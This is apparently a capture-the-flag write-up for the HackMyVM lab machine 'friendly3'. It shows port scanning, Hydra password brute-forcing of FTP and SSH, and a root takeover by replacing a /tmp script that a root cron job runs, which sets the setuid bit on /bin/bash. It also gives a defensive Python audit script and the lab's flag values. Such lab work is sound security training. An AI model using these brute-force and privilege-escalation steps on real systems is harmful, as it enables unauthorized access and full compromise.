hmv.friendly3

Information gathering

Host scan

arp-scan -l

Port scan

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn  192.168.152.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 03:30 EDT
Nmap scan report for 192.168.152.107
Host is up (0.00066s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
80/tcp open  http    nginx 1.22.1
MAC Address: 08:00:27:28:42:D2 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.16 seconds

Tried anonymous login on the FTP port: error, can't log in. But the website gives a hint that the content is on the FTP server.

Directory scan

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -t 100 -b 403,404 -x php,*  -u http://192.168.152.107

Nothing found by the scan, so let's look around the website's pages instead.

Brute-forcing the FTP user and password

┌──(root㉿kali)-[~]
└─# hydra -l juan -P /usr/share/wordlists/rockyou.txt  ftp://192.168.152.107
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-26 04:25:14
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.152.107:21/
[21][ftp] host: 192.168.152.107   login: juan   password: alexis
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-26 04:25:53

Logged into FTP successfully, but there is nothing much there.

Getting a shell

So try whether SSH login works, or brute-force SSH.

hydra -L user.txt -P /rockyou.txt ssh://ip

Got a shell.

user.txt
cb40b159c8086733d57280de3f97de30

Privilege escalation

  1. There is a user blue under /home; gathering information there turns up nothing.
  2. sudo -l cannot be used.
  3. Looking at the web root, found a bash file.
  4. Checked the scheduled task file /etc/crontab: nothing there, well.

In that case, upload a tool and analyze. There is no wget command on the box; looking at other people's writeups, there are two methods:

  1. busybox wget (first time seeing this)
  2. curl -X GET http://kali ip:8000/pspy64 -o pspy64 (forgot about this one, downloads the file)

Found a scheduled script that runs every minute: its uid (user identifier) is 0, meaning it runs as root. By setting the SUID bit we can make bash execute as the file's owner (ps: pid is the process identifier).

juan@friendly3:/opt$ cat check_for_install.sh 
#!/bin/bash


/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash

chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash

/bin/bash /tmp/a.bash

rm -rf /tmp/a.bash

So we exploit this by replacing a.bash, which hands us the use of /bin/bash as its owner.

1. a.bash

#!/bin/bash
chmod u+s /bin/bash

chmod u+s /bin/bash means: set the Setuid bit on the /bin/bash file; this bit applies only to the user (owner), i.e. the file's owner. We create an a.bash file with /bin/bash as its interpreter; when the cron job executes it, it adds the SUID bit to /bin/bash, so bash then runs as the file owner (root).

2. bash -p

Start bash in privileged mode (-p keeps the effective uid granted by the SUID bit instead of dropping it).
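The root cron job above is exploitable because it downloads into, makes writable, and then executes a file under /tmp, a directory every local user can write to. Below is an added audit script (my own, not part of the original writeup) that flags exactly these patterns in a cron-driven shell script and checks whether common shell interpreters have picked up a setuid bit; the sample script is copied from the page, everything else is assumed.

```python
import os
import re
import shlex
import stat

# Directories any local user can write to. A root job that drops a file here
# and then runs it can be hijacked by whoever replaces the file first.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = ("/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/bash", "/usr/bin/sh")

# Constructed sample: the check_for_install.sh from the writeup, blank lines removed.
SAMPLE_CRON_SCRIPT = """#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash
"""


def audit_cron_script(text):
    """Return (line number, issue, path) tuples for risky commands in a cron script."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            argv = shlex.split(line)
        except ValueError:
            argv = line.split()
        cmd = os.path.basename(argv[0])
        tmp_args = [a for a in argv[1:] if a.startswith(WORLD_WRITABLE_DIRS)]
        if not tmp_args:
            continue
        if cmd in ("curl", "wget"):
            findings.append((lineno, "downloads into world-writable dir", tmp_args[0]))
        elif cmd in ("bash", "sh", "dash", "source", "."):
            findings.append((lineno, "executes file from world-writable dir", tmp_args[0]))
        elif cmd == "chmod" and re.search(r"[+=][rwxstugoa]*w", argv[1]):
            findings.append((lineno, "adds write permission to the file", tmp_args[0]))
    return findings


def suid_shells(paths=INTERPRETERS):
    """Return the interpreters in `paths` that carry the setuid bit (normally none)."""
    hits = []
    for p in paths:
        try:
            if os.stat(p).st_mode & stat.S_ISUID:
                hits.append(p)
        except FileNotFoundError:
            pass
    return hits


if __name__ == "__main__":
    for lineno, issue, path in audit_cron_script(SAMPLE_CRON_SCRIPT):
        print(f"line {lineno}: {issue}: {path}")
    print("setuid shells:", suid_shells())
```

A fixed version of the job would fetch into a root-only directory created with mktemp, never add +w, and verify the download before running it.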

Got root.txt:

eb9748b67f25e6bd202e5fa25f534d51
